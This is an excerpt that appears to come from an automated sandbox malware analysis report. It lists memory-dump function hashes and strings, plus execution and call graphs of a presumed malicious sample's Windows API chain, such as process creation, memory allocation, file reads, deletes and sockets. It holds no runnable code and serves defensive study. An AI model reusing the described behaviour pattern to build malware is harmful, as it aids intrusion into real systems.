                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 3535d3e32a6ba624670b80a219898039e2828e7380c8985bad8002f12075ed0c
                                                                            • Instruction ID: 40de6a487299b719e0aaa7f9ad3f7fc90ed7bf3932c5977dc283e8d03eca4fed
                                                                            • Opcode Fuzzy Hash: 3535d3e32a6ba624670b80a219898039e2828e7380c8985bad8002f12075ed0c
                                                                            • Instruction Fuzzy Hash: E3315276A002199FCB14CE29DC40BEE77B8FB44750F854596E849E7250EF31AA598BA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Wow64 Emulation Layer
                                                                            • API String ID: 3446177414-921169906
                                                                            • Opcode ID: 8548c0cecbd5039ea6defdef67659f25c9640c3da53e0a26d92285af3d63e85a
                                                                            • Instruction ID: 34914342a0c1dcd2cc4a308b401c069df65024241976972ef7c9934149404df7
                                                                            • Opcode Fuzzy Hash: 8548c0cecbd5039ea6defdef67659f25c9640c3da53e0a26d92285af3d63e85a
                                                                            • Instruction Fuzzy Hash: EF214D7651021DBFEF019AA09C88DFF7B7DEF85299F014068FA01A6110EA35AE01DB70
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: bf8cd83e113dfcee559393670ad0a89b745b933e63b038a2f57b0e9c9788d06f
                                                                            • Instruction ID: e0a6f6ffbacddcc10e03f74582a91271e487d9e3210ec6ad6558ed3582b5bb23
                                                                            • Opcode Fuzzy Hash: bf8cd83e113dfcee559393670ad0a89b745b933e63b038a2f57b0e9c9788d06f
                                                                            • Instruction Fuzzy Hash: 2EE17571E1030AAFDF15DFA4C885BEEBBB5BF44314F20422AE515EB290EB74A945CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 174c45ba2219dcb7d68552f1ef5ee47a81dea791ba5312a2b234f1d6cc0eb0fc
                                                                            • Instruction ID: d56acf0f73d4c0585d85992bdc6dcd27c25d0027cc226ebe072ad7945fad9ca7
                                                                            • Opcode Fuzzy Hash: 174c45ba2219dcb7d68552f1ef5ee47a81dea791ba5312a2b234f1d6cc0eb0fc
                                                                            • Instruction Fuzzy Hash: 1CE1F075E0064ADFCB25CFA9D984ADDBBF1FF48314F20452AE556AB260D731A842CF60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: fd7250654c71dc95efaa46a0de5a31fb150ab3a6ac3feb8fef4bdb6c236f575b
                                                                            • Instruction ID: 119ca2e08803e5a2543c1e3eaf4b53f7c7ce59bd7eb858699228d185b7d6bba5
                                                                            • Opcode Fuzzy Hash: fd7250654c71dc95efaa46a0de5a31fb150ab3a6ac3feb8fef4bdb6c236f575b
                                                                            • Instruction Fuzzy Hash: A2713575E04219AFDF05CFA8D984BDDBBB5BF48310F14422AE905EF254E734A906CBA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: e10d7d53227edd19a69c101bdb56587ff4b9cb9bdd1590bbdf9e875a55481915
                                                                            • Instruction ID: b1a0ace5128da5a157e6003a43cf340d012649560477450b1b4d4a9f4b05b7b3
                                                                            • Opcode Fuzzy Hash: e10d7d53227edd19a69c101bdb56587ff4b9cb9bdd1590bbdf9e875a55481915
                                                                            • Instruction Fuzzy Hash: D25157357006169FDB08CEE8C8E4B69B7E1BB8A710B114269D906CF760DB75FC51CB80
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: a84b842cf77e929e9f9ada196edc82311934b5cef4dcfd6e136f61030c78c43e
                                                                            • Instruction ID: e2b6004c924af6e8a6794e372fcf2d4d52f25ec29e8acba3d7cd53047fb7ec69
                                                                            • Opcode Fuzzy Hash: a84b842cf77e929e9f9ada196edc82311934b5cef4dcfd6e136f61030c78c43e
                                                                            • Instruction Fuzzy Hash: C9512575E042199FDF08CF98D845ADDBBB1BF98324F14822AE816BF250D735A902CF50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                            • String ID:
                                                                            • API String ID: 4281723722-0
                                                                            • Opcode ID: 36c0b3ad02bab95111fc8d31cc92df242681b90798d4bec3d7f3b2d04aff8d1c
                                                                            • Instruction ID: 4c7122f1dcf95ca04612b94c8370a4c3777a5b95ab05d4272105fe2f9a138d24
                                                                            • Opcode Fuzzy Hash: 36c0b3ad02bab95111fc8d31cc92df242681b90798d4bec3d7f3b2d04aff8d1c
                                                                            • Instruction Fuzzy Hash: D3311A75E046299FCF15DFA8D885A9DBBF1FB88720F20422AE411BB390D7366900CF54
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction ID: b81ec1e5507c8b799652c8d4047aa3e0bd083b8b2d819dbc50bebf3fecc2aec8
                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction Fuzzy Hash: 60919171E0021A9BDB14CE69D881AEEF7A5FF44720F50461BE975EB2C2E734A9438B50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$Flst
                                                                            • API String ID: 0-758220159
                                                                            • Opcode ID: 6129b1639d372f56f8e8c96c3fb2516dc7cac959546083c5f5dda1f5f3c0570a
                                                                            • Instruction ID: eeaa5e0a7f03db7d54768ae55f26ca30fa64180da43d8ab87aa7aabcf7d03f67
                                                                            • Opcode Fuzzy Hash: 6129b1639d372f56f8e8c96c3fb2516dc7cac959546083c5f5dda1f5f3c0570a
                                                                            • Instruction Fuzzy Hash: 5B519CB1E00399CFCB14CFA9C888699FBF4EF44714F55812EE149AF250E770A985CB80
                                                                            APIs
                                                                            Strings
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1F7A063D
                                                                            • kLsE, xrefs: 1F7A0540
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 3446177414-2547482624
                                                                            • Opcode ID: afe2dcf4107fe58435a4e4e4b5c489290ee5a1941365739f0167bc4015c6c52d
                                                                            • Instruction ID: f89e7ad645760a9c9acfe7ac8a695f8395ae4630801aad5c29c5539617b4cbf0
                                                                            • Opcode Fuzzy Hash: afe2dcf4107fe58435a4e4e4b5c489290ee5a1941365739f0167bc4015c6c52d
                                                                            • Instruction Fuzzy Hash: A951BD755047428FC325DF64C484AE7B7E5AF84308F0A5E3EE9AE87240E736E545CB92
                                                                            APIs
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 1F82CFBD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8
                                                                            • String ID: @$@4Cw@4Cw
                                                                            • API String ID: 4062629308-3101775584
                                                                            • Opcode ID: 4416f5272a67ac7156e80b99ce2048673262f74906e6ca60e64ab3c10f82bba2
                                                                            • Instruction ID: 8f29a1bcae2cda96950f4565fa6adb75cf04d0c4ef8a8019769427245934eada
                                                                            • Opcode Fuzzy Hash: 4416f5272a67ac7156e80b99ce2048673262f74906e6ca60e64ab3c10f82bba2
                                                                            • Instruction Fuzzy Hash: 6641BD76D00228DFCB218FA8D854AAEBBF8FF85710F40412AE914DF260E735A941CB61
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: 0$0
                                                                            • API String ID: 3446177414-203156872
                                                                            • Opcode ID: b9d05b803032a45cd9713c470d833111712b0924c52de0ce7969484b487ca765
                                                                            • Instruction ID: ed54912e35c37c21ccae94571c5b92e582ddbe1fa37d4058b20f877738fdc4ec
                                                                            • Opcode Fuzzy Hash: b9d05b803032a45cd9713c470d833111712b0924c52de0ce7969484b487ca765
                                                                            • Instruction Fuzzy Hash: 1B415AB16087469FC300CF28D494A5ABBE5BF8D724F044A6EF488DB341D771EA05CB96

                                                                            Execution Graph

                                                                            Execution Coverage:33%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 27 8c82265 28 8c8226c socket 27->28 30 8c8231c 28->30

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            callgraph 0 Function_08C8209C 1 Function_08CA771D 2 Function_08C82265 2->0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 8c82265-8c8226b 1 8c8226c-8c8227a 0->1 2 8c8227b 1->2 3 8c822a3-8c822a7 1->3 2->3 4 8c8227d-8c822a1 2->4 5 8c822a9-8c822c4 3->5 6 8c822fd-8c82300 3->6 4->1 7 8c822cf-8c822d5 5->7 8 8c82303-8c82307 6->8 7->6 9 8c822d7-8c822fb 7->9 8->8 10 8c82309-8c82316 socket 8->10 9->7 12 8c8231c-8c82323 10->12 13 8c823b3-8c823c2 10->13 14 8c8232e-8c82334 12->14 15 8c8235c-8c82360 14->15 16 8c82336-8c8235a 14->16 18 8c823a2-8c823b0 call 8c8209c 15->18 19 8c82362-8c82369 15->19 16->14 18->13 20 8c82374-8c8237a 19->20 20->18 22 8c8237c-8c823a0 20->22 22->20
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.3367185482.0000000008C10000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_8c10000_PxuyeSuijNdsM.jbxd
                                                                            Similarity
                                                                            • API ID: socket
                                                                            • String ID:
                                                                            • API String ID: 98920635-0
                                                                            • Opcode ID: f53b3aa176c9b56ef77dac3d1fe1472f71ae2ada5a3ef9a9648009179a0be9be
                                                                            • Instruction ID: d38f5fefbade03d14d8e034c4dec2a1a6653d4979e21b5458981de2b3bdebe27
                                                                            • Opcode Fuzzy Hash: f53b3aa176c9b56ef77dac3d1fe1472f71ae2ada5a3ef9a9648009179a0be9be
                                                                            • Instruction Fuzzy Hash: CB515A70E08158DFCF09CF99C594AACBBF2BF49319F188099E456AB355C6306E42CF50

                                                                            Execution Graph

                                                                            Execution Coverage:2.5%
                                                                            Dynamic/Decrypted Code Coverage:4.3%
                                                                            Signature Coverage:0.7%
                                                                            Total number of Nodes:445
                                                                            Total number of Limit Nodes:69
                                                                            execution_graph 100801 29c9c9f 100802 29c9ca4 100801->100802 100803 29c9cb6 100802->100803 100805 29db5c0 100802->100805 100808 29d9870 100805->100808 100807 29db5d9 100807->100803 100809 29d988d 100808->100809 100810 29d989b RtlFreeHeap 100809->100810 100810->100807 101132 29c27d8 101133 29c27ec 101132->101133 101136 29c6340 101133->101136 101135 29c2803 101137 29c6373 101136->101137 101138 29c6397 101137->101138 101143 29d90b0 101137->101143 101138->101135 101140 29c63ba 101140->101138 101141 29d9520 NtClose 101140->101141 101142 29c643a 101141->101142 101142->101135 101144 29d90cd 101143->101144 101147 3772ca0 LdrInitializeThunk 101144->101147 101145 29d90f6 101145->101140 101147->101145 101148 29b9e50 101149 29b9e5f 101148->101149 101150 29b9ea0 101149->101150 101151 29b9e8d CreateThread 101149->101151 100812 29c7390 100813 29c7402 100812->100813 100814 29c73a8 100812->100814 100814->100813 100816 29cb2f0 100814->100816 100817 29cb316 100816->100817 100818 29cb549 100817->100818 100843 29d9900 100817->100843 100818->100813 100820 29cb38c 100820->100818 100846 29dc790 100820->100846 100822 29cb3ab 100822->100818 100823 29cb482 100822->100823 100852 29d8bc0 100822->100852 100825 29c5bb0 LdrInitializeThunk 100823->100825 100827 29cb4a1 100823->100827 100825->100827 100832 29cb531 100827->100832 100863 29d8730 100827->100863 100828 29cb46a 100859 29c8180 100828->100859 100830 29cb416 100830->100818 100830->100828 100831 29cb448 100830->100831 100856 29c5bb0 100830->100856 100878 29d4850 LdrInitializeThunk 100831->100878 100834 29c8180 LdrInitializeThunk 100832->100834 100838 29cb53f 100834->100838 100838->100813 100839 29cb508 100868 29d87e0 100839->100868 100841 29cb522 100873 29d8940 100841->100873 100844 29d991a 100843->100844 100845 29d992b CreateProcessInternalW 100844->100845 100845->100820 100847 29dc700 100846->100847 100848 29dc75d 100847->100848 100879 29db6a0 100847->100879 100848->100822 100850 29dc73a 100851 29db5c0 RtlFreeHeap 100850->100851 100851->100848 100853 29d8bdd 100852->100853 100885 3772c0a 100853->100885 100854 29cb40d 100854->100823 100854->100830 100888 29d8d90 100856->100888 100858 29c5bee 100858->100831 100860 29c8193 100859->100860 100894 29d8ac0 100860->100894 100862 29c81be 100862->100813 100864 29d875b 100863->100864 100865 29d87ad 100863->100865 100864->100839 100900 37739b0 LdrInitializeThunk 100865->100900 100866 29d87cf 100866->100839 100869 29d885a 100868->100869 100870 29d8808 100868->100870 100901 3774340 LdrInitializeThunk 100869->100901 100870->100841 100871 29d887c 100871->100841 100874 29d89ba 100873->100874 100875 29d8968 100873->100875 100902 3772fb0 LdrInitializeThunk 100874->100902 100875->100832 100876 29d89dc 100876->100832 100878->100828 100882 29d9820 100879->100882 100881 29db6bb 100881->100850 100883 29d983d 100882->100883 100884 29d984b RtlAllocateHeap 100883->100884 100884->100881 100886 3772c11 100885->100886 100887 3772c1f LdrInitializeThunk 100885->100887 100886->100854 100887->100854 100889 29d8dbf 100888->100889 100890 29d8e41 100888->100890 100889->100858 100893 3772d10 LdrInitializeThunk 100890->100893 100891 29d8e83 100891->100858 100893->100891 100895 29d8b3b 100894->100895 100897 29d8ae8 100894->100897 100899 3772dd0 LdrInitializeThunk 100895->100899 100896 29d8b5d 100896->100862 100897->100862 100899->100896 100900->100866 100901->100871 100902->100876 101152 29cadd0 101157 29caae0 101152->101157 101154 29caddd 101171 29ca760 101154->101171 101156 29cadf3 101158 29cab05 101157->101158 101182 29c83f0 101158->101182 101161 29cac53 101161->101154 101163 29cac6a 101163->101154 101164 29cac61 101164->101163 101166 29cad57 101164->101166 101201 29ca1b0 101164->101201 101168 29cadba 101166->101168 101210 29ca520 101166->101210 101169 29db5c0 RtlFreeHeap 101168->101169 101170 29cadc1 101169->101170 101170->101154 101172 29ca776 101171->101172 101179 29ca781 101171->101179 101173 29db6a0 RtlAllocateHeap 101172->101173 101173->101179 101174 29ca7a2 101174->101156 101175 29c83f0 GetFileAttributesW 101175->101179 101176 29caab2 101177 29caacb 101176->101177 101178 29db5c0 RtlFreeHeap 101176->101178 101177->101156 101178->101177 101179->101174 101179->101175 101179->101176 101180 29ca1b0 RtlFreeHeap 101179->101180 101181 29ca520 RtlFreeHeap 101179->101181 101180->101179 101181->101179 101183 29c8411 101182->101183 101184 29c8423 101183->101184 101185 29c8418 GetFileAttributesW 101183->101185 101184->101161 101186 29d3420 101184->101186 101185->101184 101187 29d342e 101186->101187 101188 29d3435 101186->101188 101187->101164 101189 29c45c0 LdrLoadDll 101188->101189 101190 29d346a 101189->101190 101191 29d3479 101190->101191 101214 29d2ee0 LdrLoadDll 101190->101214 101192 29db6a0 RtlAllocateHeap 101191->101192 101197 29d3627 101191->101197 101194 29d3492 101192->101194 101195 29d361d 101194->101195 101194->101197 101198 29d34ae 101194->101198 101196 29db5c0 RtlFreeHeap 101195->101196 101195->101197 101196->101197 101197->101164 101198->101197 101199 29db5c0 RtlFreeHeap 101198->101199 101200 29d3611 101199->101200 101200->101164 101202 29ca1d6 101201->101202 101215 29cdbe0 101202->101215 101204 29ca248 101206 29ca3d0 101204->101206 101207 29ca266 101204->101207 101205 29ca3b5 101205->101164 101206->101205 101208 29ca070 RtlFreeHeap 101206->101208 101207->101205 101220 29ca070 101207->101220 101208->101206 101211 29ca546 101210->101211 101212 29cdbe0 RtlFreeHeap 101211->101212 101213 29ca5cd 101212->101213 101213->101166 101214->101191 101217 29cdbf2 101215->101217 101216 29cdc11 101216->101204 101217->101216 101218 29db5c0 RtlFreeHeap 101217->101218 101219 29cdc54 101218->101219 101219->101204 101221 29ca08d 101220->101221 101224 29cdc70 101221->101224 101223 29ca193 101223->101207 101225 29cdc94 101224->101225 101226 29cdd3e 101225->101226 101227 29db5c0 RtlFreeHeap 101225->101227 101226->101223 101227->101226 100908 29d9390 100909 29d9437 100908->100909 100911 29d93bb 100908->100911 100910 29d944a NtReadFile 100909->100910 101228 29d84d0 101229 29d84ea 101228->101229 101230 29d84f8 RtlDosPathNameToNtPathName_U 101229->101230 101231 29d1bd0 101235 29d1be9 101231->101235 101232 29d1c79 101233 29d1c31 101234 29db5c0 RtlFreeHeap 101233->101234 101236 29d1c41 101234->101236 101235->101232 101235->101233 101237 29d1c74 101235->101237 101238 29db5c0 RtlFreeHeap 101237->101238 101238->101232 100912 29c6e8d 100913 29c6e4d 100912->100913 100916 29c6e90 100912->100916 100917 29c7fb0 100913->100917 100915 29c6e64 100918 29c7fcd 100917->100918 100924 29d8cb0 100918->100924 100920 29c801d 100921 29c8024 100920->100921 100922 29d8d90 LdrInitializeThunk 100920->100922 100921->100915 100923 29c804d 100922->100923 100923->100915 100925 29d8cdb 100924->100925 100926 29d8d4b 100924->100926 100925->100920 100929 3772f30 LdrInitializeThunk 100926->100929 100927 29d8d81 100927->100920 100929->100927 101239 29c5b4b 101240 29c5b6a 101239->101240 101241 29c5b6f 101239->101241 101242 29d9520 NtClose 101240->101242 101242->101241 101243 29bb540 101244 29db530 NtAllocateVirtualMemory 101243->101244 101245 29bcbb1 101244->101245 100932 29c0e00 100933 29c0e1a 100932->100933 100938 29c45c0 100933->100938 100935 29c0e38 100936 29c0e6c PostThreadMessageW 100935->100936 100937 29c0e7d 100935->100937 100936->100937 100939 29c45e4 100938->100939 100940 29c45eb 100939->100940 100941 29c4620 LdrLoadDll 100939->100941 100940->100935 100941->100940 100942 29c2300 100943 29d8bc0 LdrInitializeThunk 100942->100943 100944 29c2336 100943->100944 100947 29d95b0 100944->100947 100946 29c234b 100948 29d963c 100947->100948 100949 29d95d8 100947->100949 100952 3772e80 LdrInitializeThunk 100948->100952 100949->100946 100950 29d966a 100950->100946 100952->100950 100953 29d9480 100954 29d94f4 100953->100954 100956 29d94a8 100953->100956 100955 29d9507 NtDeleteFile 100954->100955 101246 29dc6c0 101247 29db5c0 RtlFreeHeap 101246->101247 101248 29dc6d5 101247->101248 101249 29d1840 101250 29d185c 101249->101250 101251 29d1898 101250->101251 101252 29d1884 101250->101252 101254 29d9520 NtClose 101251->101254 101253 29d9520 NtClose 101252->101253 101255 29d188d 101253->101255 101256 29d18a1 101254->101256 101259 29db6e0 RtlAllocateHeap 101256->101259 101258 29d18ac 101259->101258 101260 29d6140 101261 29d619a 101260->101261 101262 29d61a7 101261->101262 101264 29d3b50 101261->101264 101265 29db530 NtAllocateVirtualMemory 101264->101265 101266 29d3b91 101265->101266 101267 29c45c0 LdrLoadDll 101266->101267 101269 29d3c9e 101266->101269 101270 29d3bd7 101267->101270 101268 29d3c20 Sleep 101268->101270 101269->101262 101270->101268 101270->101269 100957 3772ad0 LdrInitializeThunk 100958 29c31b5 100959 29c3167 100958->100959 100964 29c31bb 100958->100964 100965 29c7e00 100959->100965 100963 29c318f 100966 29c3173 100965->100966 100967 29c7e1a 100965->100967 100966->100963 100971 29d9520 100966->100971 100974 29d8c60 100967->100974 100970 29d9520 NtClose 100970->100966 100972 29d953a 100971->100972 100973 29d9548 NtClose 100972->100973 100973->100963 100975 29d8c7d 100974->100975 100978 37735c0 LdrInitializeThunk 100975->100978 100976 29c7eea 100976->100970 100978->100976 100979 29b9eb0 100980 29ba1c0 100979->100980 100982 29ba5e3 100980->100982 100983 29db220 100980->100983 100984 29db246 100983->100984 100989 29b4070 100984->100989 100986 29db252 100987 29db28b 100986->100987 100992 29d56d0 100986->100992 100987->100982 100996 29c3270 100989->100996 100991 29b407d 100991->100986 100993 29d5732 100992->100993 100995 29d573f 100993->100995 101007 29c1a30 100993->101007 100995->100987 100998 29c328d 100996->100998 100997 29c32a3 100997->100991 100998->100997 101000 29d9f50 100998->101000 101002 29d9f6a 101000->101002 101001 29d9f99 101001->100997 101002->101001 101003 29d8bc0 LdrInitializeThunk 101002->101003 101004 29d9ff6 101003->101004 101005 29db5c0 RtlFreeHeap 101004->101005 101006 29da00f 101005->101006 101006->100997 101008 29c1a6b 101007->101008 101023 29c7f10 101008->101023 101010 29c1a73 101011 29c1d56 101010->101011 101012 29db6a0 RtlAllocateHeap 101010->101012 101011->100995 101013 29c1a89 101012->101013 101014 29db6a0 RtlAllocateHeap 101013->101014 101015 29c1a9a 101014->101015 101016 29db6a0 RtlAllocateHeap 101015->101016 101017 29c1aab 101016->101017 101021 29c1b48 101017->101021 101038 29c6aa0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101017->101038 101019 29c45c0 LdrLoadDll 101020 29c1d02 101019->101020 101034 29d8010 101020->101034 101021->101019 101024 29c7f3c 101023->101024 101025 29c7e00 2 API calls 101024->101025 101026 29c7f5f 101025->101026 101027 29c7f69 101026->101027 101028 29c7f81 101026->101028 